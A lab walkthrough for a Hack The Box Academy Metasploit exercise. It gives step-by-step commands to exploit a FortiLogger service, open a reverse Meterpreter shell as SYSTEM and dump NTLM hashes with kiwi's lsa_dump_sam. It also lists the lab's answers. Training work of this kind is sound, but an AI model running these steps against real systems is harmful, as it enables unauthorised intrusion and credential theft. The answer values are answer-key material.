Meterpreter — Using the Metasploit Framework Module — HTB Walkthrough
TIER 0 MODULE: USING THE METASPLOIT FRAMEWORK
SECTION: Meterpreter
Please open your pwnbox or connect to the vpn in order to complete the tasks.
1. Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?
Recall what the previous question (from the previous section, ‘Sessions’) says: it refers to a “specific web application”, whose name we can find in the page source code. Let’s run a quick nmap scan.
nmap -sV -n <target-ip>
See? We found a service that uses ‘http’ on port 5000. Let’s visit its webpage and view the source code.
view-source:<target-ip>:<port>
We obtained the name ‘FortiLogger’ from the source, so let’s look for an exploit.
msfconsole -q
search FortiLogger
We found an exploit, and we will use it.
use 0
Configure the module for the attack. Set the target IP:
set rhost <target-ip>
Set the attacker device IP:
set lhost <your-vpn-ip>
Then start the attack:
run
Once the Meterpreter session is connected, run
getuid
to obtain the username.
Answer: NT AUTHORITY\SYSTEM
2. Retrieve the NTLM password hash for the “htb-student” user. Submit the hash as the answer.
In the same Meterpreter session, enter:
lsa_dump_sam
It says that it needs to load an extension named ‘kiwi’, so we will load it.
load kiwi
Run the command again:
lsa_dump_sam
Look for the NTLM password hash of ‘htb-student’ in the output.
Answer: cf3a5525ee9414229e66279623ed5c58
☣️ HAPPY ETHICAL HACKING ☣️
DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)